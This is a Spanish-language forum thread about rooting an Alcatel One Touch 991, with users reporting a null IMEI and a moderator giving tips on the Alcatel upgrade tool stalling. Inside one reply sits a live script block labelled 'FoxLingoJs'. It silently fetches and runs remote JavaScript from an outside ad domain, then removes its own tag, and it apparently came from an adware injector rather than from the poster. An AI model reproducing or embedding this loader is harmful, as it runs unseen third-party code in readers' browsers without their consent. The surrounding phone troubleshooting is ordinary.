Root Alcatel 991

breakk dijo:
Aunque no es un dualsim, te doy permiso para poner el tutorial.

Crea un hilo nuevo para el tuto o dimelo y lo miramos.

Saludos.

En un par de dias estare en casa y nos curraremos un tuto si te parece bien, igual que cuando tenga el movil que me he pedido dualsim tambien podria hacer una review.

Enviado desde mi Alcatel One Touch 991 usando Forun Runner
 
En un par de dias estare en casa y nos curraremos un tuto si te parece bien, igual que cuando tenga el movil que me he pedido dualsim tambien podria hacer una review.

Enviado desde mi Alcatel One Touch 991 usando Forun Runner

Cuando tu quieras, un saludo.
 
Hola Galaxian, me pone lo mismo que a ti, Imei:Null, he intentado recuperar con alcatel ugrade pero no me deja, se queda al 50% y no pasa de ahi, lo he intentado como 20 veces. ¿Podrias echarme una mano?
saludos
 
Hola Galaxian, me pone lo mismo que a ti, Imei:Null, he intentado recuperar con alcatel ugrade pero no me deja, se queda al 50% y no pasa de ahi, lo he intentado como 20 veces. ¿Podrias echarme una mano?
saludos


Buenos dias.

Primero que nada te aconsejo que te pases por el hilo de presentaciones.

En segundo lugar, bienvenido.



Esto que te ocurre que se queda al 50% y no pasa, me ha pasado con otros terminales. Lo cierto es que es muy mosqueante y te desesperas. Yo lo solucioné del siguiente modo:

Si tienes acceso a otro pc, te instalas el alcatel upgrade y vuelves a realizar el proceso.

Otro modo es que cuando veas que se queda bloqueado al tanto %, coges y quitas el cable usb de la parte del pc, esperas 10 segundos y lo vuelves a conectar. Esto es culpa del servidor de Alcatel que es una kaka y se queda pillado.

Te comento que el proceso puede durar media hora mas o menos en condiciones normales. Primero te baja toda la rom a trozos de pocos kbs, y luego el programa lo empaqueta y cuando te manda reiniciar el telefono o quitar el cable y volverlo a poner, entonces es cuando sube la rom nueva a tu telefono. Ya te indicará cuando termine con un aviso en pantalla. Mientas, no se te ocurra quitar el cable una vez ha empezado a subir la rom al telefono (te va indicando que esta subiendo todos los archivos).

Saludos y suerte.

<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>
 
hola necesito liberar un alcatel one touch 991 de una sola sim de yoigo, el caso es que intente hacerlo por doctorsim pero el codigo que me enviaron no funciona al parecer no puedo liberarlo por imei queria saber si al hacerle la root se libera, o como podria hacerlo lo necesito urguente ya que me voy del pais y necesito tenerlo libre, muchas gracias y disculopen las molestias :blush:
 
hola necesito liberar un alcatel one touch 991 de una sola sim de yoigo, el caso es que intente hacerlo por doctorsim pero el codigo que me enviaron no funciona al parecer no puedo liberarlo por imei queria saber si al hacerle la root se libera, o como podria hacerlo lo necesito urguente ya que me voy del pais y necesito tenerlo libre, muchas gracias y disculopen las molestias :blush:

Hola, aqui no damos soporte al tema de liberar moviles. Mas que nada porque todos los moviles dualsim son libres de origen.

Si haces root no vas a liberar el movil . El bloqueo del movil es cuestión de codigos de tu operador, en este caso yoigo.

Te aconsejo que vayas a alguna tienda.


Saludos.
 
pues eso he intentado hacer root a mi alcatel 991, el tema es que cuando he encendido por primera vez el telefono funcionaba perfectamente, pero cuando lo he echo la segunda vez, woooo sorpresa, me ha dejado de funcionar el imei, cuando pongo *#06* me dice imei null, y en el svn: 010 02, en banda base creo que pone 6548, he probado con el recuperador de imei de los zopo 100 que llevan el mismo chip pero nada de nada, esto sigue igual.

. apelo a vuestra sabiduria, se que no tengo excusa :( pero a ver si alguien podria ayudarme, muchas gracias.


Oye pudiste arreglar el imei del cel.. me podrias colaborar a mi tengo un ot 991 o que hiciste oara arreglarlo sin el one touch ugrade[DOUBLEPOST=1403927455][/DOUBLEPOST]Alguien me puede colaborar con el problema que Tengo del imei me aparece '' IMEI: null y no puedo recuperarlo con el one touch upgrade ya probe de todo pero no se ... alguien me ayuda auxilio ....[DOUBLEPOST=1403929056][/DOUBLEPOST]Esto me aparece cuando utilizo el one touch upgrade .... que hago porfa alguien que me colabore [Imagen Externa Rota]:https://www.dropbox.com/s/eh6rmc6pc6vq7t1/ERROR.JPG
 
Última edición:

Del blog

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba